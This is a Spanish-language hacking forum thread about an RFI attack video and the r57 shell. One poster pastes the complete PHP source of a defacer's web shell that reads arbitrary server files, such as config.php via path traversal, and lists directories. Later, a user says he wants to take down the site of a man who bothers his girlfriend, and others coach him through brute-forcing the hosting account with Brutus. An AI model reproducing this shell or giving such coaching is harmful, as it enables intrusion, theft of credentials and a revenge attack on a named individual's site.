Precisamente Que Hace, Alguien que me Traduzca :s

[milocheri]

http://rapidshare.de/files/28976495/WildBoy.rar.html

[milocheri]

Mmmm chale

[ozx]

mmmm... me huele a troyano...
di mas info, de k se trata?

[Bluedeyabu]

mmmm mi experiencia dice... el ke no arriega no Gana... el ke no prueba no sabe ke es... ya veo ke es...  y te digo si puedo traducirlo..
Saludos..
Deyabu Roolz

[Bluedeyabu]

jeje lo ke se perdieron los ke no lo vieron... un atake FRI maravilloso.. ejje  muy lindo... te explica como ahcerlo.. aunke no hay ke traducir  nada pues esta en ingles unas 13 palabras y lo demas esta en eslovaco (Creo) y es un paguina web nomas..
lo ke ahce este tal wildboy es, te muestra como hace un atake rfi .. usa la shell "r57 shell "..
muy lindo el video..
Saludos..
Deyabu Roolz

[milocheri]

Ahhh pero, podria yo  hacer eso,  con que herramientas, si cuando yo vi el vidio me ke de de asi :|, ta sheedo

[Bluedeyabu]

busca info sobre rfi (remote file intrusion) .. no es muy dificil.. solo ke buscalo en la web.
Deyabu Roolz

[milocheri]

Okasz, Por cierto, una duda, es posible, hackear  una web alojada en algun hosting gratuito , Hay un tipo ke me purga, por ke le tiralos perros a mi nena, el hijo de la shin le kiero tirar su web, es posible, su web esta hecha en Html

[josealcuevas]

Con brute force (el brutus).

Komtec1

[porq69]

Bueno la famosa shell r57 es un script realizado por un Clan Ruso llamados RST (Rush Security Team), si se pasan por su pagina encontraran unos buenos tools echos por ellos mismos y la mayoria de los script echos en perl **No hay nada mejor q perl  Esta es la direccion rst.void.ru y como aprendo Ruso??? Pues no creo q nadie se ponga a buscar un diccionario Ruso Haci q no hay nada mejor q los traductores on-line Bueno San Google no tiene lengua rusa :S pero pueden usar Babel Fish ^^ world.altavista.com

Volviendo a las shell RFI, Megabyte creo una shell bastante util y no muchos la tienen pero aqui se las dejo::

Code Select Expand

<?

/*

               Ultimate shell Tool by Megabyte 1.0


Estas cansado de las shells de revengans,o command tribulation?
Estas cansado de no poder navegar en safe mode??
Esta herramienta fue creada por un defacer para los defacers,viendo que las shells
populares no cubrian mis necesidades asi que tuve ke krear esta herramienta.

Esta shell no pretende sustituir a ninguna de las anteriores,pero es una buena opcion
tenerla entre tu coleccion de herramientas,cuando todo lo demas falle,por ke no probar esta tool??

Esta disenada usando funciones diferentes a las que siempre vemos en todas las shells
para poder navegar por mas sistemas sin limitaciones(no mas problemas con passtru,exec,cmd)
Se usan funciones como show source,en vez del tipico cat,declarando variables externas para una mejor
compatibilidad etc.

Si kieres kambiarle los kreditos,me vale verga,puedes ponerle tu nick y decir k tu la hiciste
y ke yo te robe el codigo,a fin de cuentas si kieres enganarte a ti mismo,alla tu.

Pandora Te amo

Greetx:
             Nobody,i hate everyone xDD

                       www.mbytesecurity.org
               
               El maximo exponente blackhat de Latinoamerica


*/

// En caso del ke server sea mamon con variables externas

$mode = $_GET['mode'];
$cat = $_GET['cat'];
$dir = $_GET['dir'];

// Index Inicial: sin opción seleccionada

if($mode=="")
{
echo"<title>Ultimate shell Tool by Megabyte 1.0</title>";
echo"<body bgcolor=#000000><center>";
echo"<p><font face=Fixedsys size=5><font color=#FF0000>U</font><font color=#FFFFFF>ltimate ";
echo"</font><font color=#FF0000>S</font><font color=#FFFFFF>hell </font>";
echo"<font color=#FF0000>T</font><font color=#FFFFFF>ool<br>By </font>";
echo"<font color=#FF0000>M</font><font color=#FFFFFF>egabyte<br>";
echo"</font></font><font color=#FFFFFF><br>";
echo"&nbsp;</font></p>";
echo"</center>";
echo"<p align=justify><font face=Fixedsys color=#FF0000>1.-</font><font color=#FFFFFF face=Fixedsys><a href=?mode=steal><font color=#3366FF>Roba ";
echo"Source</font></a>:<br>";
echo"&nbsp;&nbsp;&nbsp; Con esto podemos leer en texto plano el código de cualquier ";
echo"archivo en el servidor (ya sea php, htaccess, logs, etc..). Es un <u>reemplazo</u> ";
echo"del comando &quot;cat archivo.x&quot; de linux. Nos sirve cuando queremos usar una shell y ";
echo"claro... el servidor <u>no nos permite</u> (passtrhu desactivado, etc...) o debido a que corre bajo Windows.<br>";
echo"<br>";
echo"</font><font size=2 face=Arial color=#C0C0C0>Ejemplo de Uso:<br>";
echo"www.sitio.com/utool.php?mode=steal&amp;cat=../../../home/user/public_html/config.php</font></p>";
echo"<p align=left>&nbsp;</p>";
echo"<p align=justify><font face=Fixedsys color=#FF0000>2.-</font><font color=#FFFFFF face=Fixedsys><a href=?mode=list><font color=#3366FF>Directory ";
echo"Listing</font></a>:<br>";
echo"&nbsp;&nbsp;&nbsp; Podemos ver todos los archivos y directorios en una carpeta. ";
echo"Reemplaza el comando &quot;ls&quot;, al igual que antes, cuando no podemos utilizar shell o cuando corre bajo Windows.";
echo"<br>Muestra todos los archivos y directorios como enlaces, si presionas uno de ";
echo"estos enlaces podrás ver el contenido (código) de dicho archivo. Si se trata de ";
echo"un directorio, te dará un error.<br>";
echo"Nos va a ser muy útil para explorar los directorios y saber donde estan las ";
echo"configuraciones.<br>";
echo"<br>";
echo"</font><font face=Fixedsys color=#C0C0C0><u>Nota:</u> Nos va a indicar en ";
echo"donde se ejecuto el script, a modo de saber cual es la dirección de los ";
echo"directorios (en este caso: home/user/public_html/).</font><font color=#FFFFFF face=Fixedsys><br>";
echo"<br>";
echo"</font><font size=2 face=Arial color=#C0C0C0>Ejemplo de Uso:<br>";
echo"www.sitio.com/utool.php?mode=list&amp;dir=home/user/public_html/</font></p>";
echo"<center>";
echo"<p>&nbsp;</p>";
echo"<p><BR><b><font face=Courier New size=1 color=#C0C0C0>Creado por Megabyte<br><br><br>www.mbytesecurity.org<br>Pandora Te amo<br>
http://www.zone-h.org/en/defacements/filter/filter_defacer=MEGABYTE+WWW.MBYTE.TK</font></b></p>";
echo"</center>";
}
elseif($mode=="steal")
{

// Modo 1: Robar codigo

echo "<html>";
echo "<head>";
echo "<title>Robar codigo</title>";
echo "</head>";
echo "<body>";

// Si no indicamos archivos, probar el concepto mostrando el codigo de esta tool

if($cat=="")
{
$cat="utool.php";
}

$size=filesize($cat);
$file_size = round($size / 1024 * 100) / 100 . "Kb";   //Operaciones matematicas muy complejas
                                                       // para tipos como slasher o HackZatan....
                                                       //si no estudiaste no intententes comprenderlo :)

echo"<body bgcolor=#000000><center><font color=#FF0000 face=Fixedsys size=2>V</font><font color=#FFFFFF face=Fixedsys size=2>iendo <B>$cat</B> -  </font><font color=#FF0000 face=Fixedsys size=2>T</font><font color=#FFFFFF face=Fixedsys size=2>amaño: <B>$file_size</B></font><table width=94% border=2 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";
$po=show_source($cat);
echo "</td></tr></table><BR><b><font face=Courier New size=1 color=#C0C0C0>Creado por Megabyte<br><br><br>www.mbytesecurity.org<br>Pandora Te amo<br>
http://www.zone-h.org/en/defacements/filter/filter_defacer=MEGABYTE+WWW.MBYTE.TK</font></b></center>";
echo "</body></html>";
}
elseif($mode=="list")
{

// Modo 2: Explorar Directorios

echo"<title>Directory Listing</title>";
$base = substr($_SERVER['PATH_TRANSLATED'],0,strrpos($_SERVER['PATH_TRANSLATED'],'/'));

// Mostrar contenido de directorio inicial

if($dir=="")
{
$dir="./";
}
$path = $dir;

// Funcion simple reconocer archivos (php.net)

function after ($this, $inthat)
   {
       if (!is_bool(strpos($inthat, $this)))
       return substr($inthat, strpos($inthat,$this)+strlen($this));
   }

echo "<body bgcolor=#000000><center><font face=Fixedsys size=2 color=#FF0000>E</font><font face=Fixedsys size=2 color=#FFFFFF>jecutando </font><font face=Fixedsys size=2 color=#FF0000>e</font><font face=Fixedsys size=2 color=#FFFFFF>n: <B>$base<br></B></font><font face=Fixedsys size=2 color=#FF0000>V</font><font face=Fixedsys size=2 color=#FFFFFF>iendo </font><font face=Fixedsys size=2 color=#FF0000>D</font><font face=Fixedsys size=2 color=#FFFFFF>irectorio:<B>$dir</B></font><table width=94% border=2 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";
$dir_handle = @opendir($path) or die("No se pudo abrir $path");
while (false !== ($file = readdir($dir_handle))) {
$link = "<a target=_blank href=utool.php?mode=steal&cat=$dir/$file><font color=#000080>$file</font></a><br>";
$formato = after('.', $file);

// Reconocer posición de retroceder

If($formato==".") {
$link = "<i><a href=utool.php?mode=list&dir=$dir/$file>retroceder..</a><br></i>";
}

// Muy simple: Sin formato, debe ser directorio (aquí error en directorios con puntos)

If($formato=="") {
$link = "<a href=utool.php?mode=list&dir=$dir/$file><font color=#800000>$file</font></a><br>";
}

// Mostrar directorio, archivo o retroceder (con colores, claro, para no confundir XD)

echo "$link";
}
closedir($dir_handle);
echo "</td></tr></table><BR><b><font face=Courier New size=1 color=#C0C0C0>Creado por Megabyte<br><br><br>www.mbytesecurity.org<br>Pandora Te amo<br>
http://www.zone-h.org/en/defacements/filter/filter_defacer=MEGABYTE+WWW.MBYTE.TK</font></b></center>";
}
?>

Cualquier duda posteen 

[milocheri]

Vale Tomare en Cuenta Cada cosa que me dicen, Por Cierto Komtec, ya tengo el Brutus, pero no se como debo atacar, podrias decirme

[josealcuevas]

en user vas a poner la url... por ejemplo lycos.es o algo asi, en pass mode vas a poner brute force, y seleccionaras single user y pones el id del user, y a esperar....


Komtec1

[milocheri]

Pero y si no se el ID del User ?

[josealcuevas]

el user es lycos.tal.com o algo asi tal es el user....


Komtec1